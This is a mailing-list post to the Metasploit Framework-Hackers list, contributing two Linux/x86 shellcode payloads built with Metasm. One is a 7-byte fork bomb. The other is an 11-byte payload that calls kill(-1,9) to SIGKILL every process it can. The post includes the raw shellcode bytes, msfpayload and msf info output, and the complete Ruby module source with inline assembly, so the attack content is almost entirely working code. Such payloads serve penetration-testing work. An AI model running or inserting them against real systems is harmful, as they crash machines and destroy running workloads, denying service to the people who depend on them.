-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey guys,
I just started playing around with Metasm earlier today (it's great!), and drew up a couple of simple Linux/x86 payloads to test some of it out a bit. I don't think these are really of interest for inclusion, but you're of course welcome to them if they are. I figure sending them can't hurt anything. The first is a fork bomb in 7 bytes, and the other is kill(-1,9) in 11 bytes. These are some things I did when I first started playing with shellcode: http://www.milw0rm.com/shellcode/2805 http://www.milw0rm.com/shellcode/3446 And as you can see they're the same: $ ./msfpayload linux/x86/forkbomb y # linux/x86/forkbomb - 7 bytes # http://www.metasploit.com # AppendExit=false, PrependSetresuid=false, # PrependSetuid=false, PrependSetreuid=false "\x6a\x02\x58\xcd\x80\xeb\xf9" $ ./msfpayload linux/x86/killall y # linux/x86/killall - 11 bytes # http://www.metasploit.com # AppendExit=false, PrependSetresuid=false, # PrependSetuid=false, PrependSetreuid=false "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80" Quite cool. msf > info linux/x86/forkbomb Name: Linux Fork Bomb (Metasm) Version: 1 Platform: Linux Arch: x86 Needs Admin: No Total size: 40 Provided by: Kris Katterjohn <[EMAIL PROTECTED]> Description: This payload launches a fork bomb, i.e. 'for (;;) fork()' msf > info linux/x86/killall Name: Linux Kill All Processes (Metasm) Version: 1 Platform: Linux Arch: x86 Needs Admin: No Total size: 44 Provided by: Kris Katterjohn <[EMAIL PROTECTED]> Description: This payload sends SIGKILL to all of the processes we are permitted to send to via kill(-1, 9) Thanks, Kris Katterjohn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSOwK+P9K37xXYl36AQJtRBAAg3Cj6s74kIo5omriszgnB2nKmckfgqrL tGexyRkSAMrTEFsaCmULb/r88Un/mVFNn6elOtnp7CG1Py7BpMUO0hniVIIp6cbI 7zvsnu4R9aKyBiXzL9BqSwu9aw7AU/qcdzhsufYzi2C3WAbHsr2Ki9pHKWZUst8a GfHZjp7NDnRgEOF3dacWdc+J4gwFMnmyee/SxwWdvTawWbFaOQguaCb6ajPmn9oa 728pTSMPshby0W0LspXLxHEmfQ3pAhAfPYmLX29L0zFk45x3LqIp0opMxaeIRIHI 3eCQmiLQTVffss276xJ3VhVpfPxzvR1SzhdMxvdK0qdxfLESelFhE1toV92fySDy vM8gIxpXXPrcm3gBcC1u+y6pule7RvIkmphlaIrZK7j7KLaMHLXV84E8YVkeIoH1 rXal5R3eMmL/xOecFAFnKz37vVSpjDj7DaCs3PThGzThf/bRDjdkQmkwcdeZlMLI +7vlmw8BGHqr7S93+l6dWriLLomg+jYYWkOzi//soRs58T/94oPB53BOSbIVaIQN Qlg69nprC0mq41ARYAfxgLK6Ja5lCkHK9AyT5MWOKlOIuOoUfMSSr4N3GAX69pgW Mx7KaLfPc4ssYhrxDuphVn3OqXhjHO3/xzSRUf0cmURttpmd7hD7w8akje5fDmhB 9OtnXc1uOlo= =1gYi -----END PGP SIGNATURE-----
require 'msf/core' require 'metasm' module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Fork Bomb (Metasm)', 'Version' => '1', 'Description' => %q{ This payload launches a fork bomb, i.e. 'for (;;) fork()' }, 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Payload' => { 'Offsets' => {}, 'Assembly' => <<EOA ; http://milw0rm.com/shellcode/2805 _start: push 2 pop eax int 0x80 jmp _start EOA } )) end end
require 'msf/core' require 'metasm' module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Kill All Processes (Metasm)', 'Version' => '1', 'Description' => %q{ This payload sends SIGKILL to all of the processes we are permitted to send to via kill(-1, 9) }, 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Payload' => { 'Offsets' => {}, 'Assembly' => <<EOA ; http://milw0rm.com/shellcode/3446 push 37 pop eax push -1 pop ebx push 9 pop ecx int 0x80 EOA } )) end end
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers